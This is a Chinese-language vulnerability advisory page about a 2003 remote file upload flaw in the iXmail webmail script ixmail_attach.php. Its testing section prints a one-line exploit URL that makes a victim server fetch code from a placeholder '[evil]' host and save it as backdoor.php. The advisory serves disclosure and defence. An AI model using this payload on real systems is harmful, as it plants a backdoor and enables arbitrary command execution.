首页 -> 安全研究

安全研究

安全漏洞
iXmail远程任意文件上传漏洞

发布日期:2003-06-26
更新日期:2003-07-03

受影响系统:
a-suivre.net iXmail 0.3
a-suivre.net iXmail 0.2
描述:
BUGTRAQ  ID: 8048

iXmail是一款基于WEB的邮件服务程序。

iXmail对用户提交参数缺少充分过滤,远程攻击者可以利用这个漏洞上传恶意文件,以WEB权限在系统上执行任意命令。

iXmail包含的"ixmail_attach.php"脚本对用户提交的附件缺少充分过滤,攻击者可以通过操作URL参数上传恶意文件(如php文件)到服务器上,虽然文件放置在Web目录下的/tmp目录中,但可以远程访问,因此攻击者可能以WEB进程权限在系统上执行任意命令。

<*来源:frog (leseulfrog@hotmail.com.)
  
  链接:http://www.frog-man.org/tutos/iXmail.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

frog <leseulfrog@hotmail.com>提供了如下的测试方法:

http://[victim]/ixmail_attach.php?submit=1&attach1=http://[evil]/badcode.txt&attach1_name=backdoor.php

建议:
厂商补丁:

a-suivre.net
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.a-suivre.net/

浏览次数:2674
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障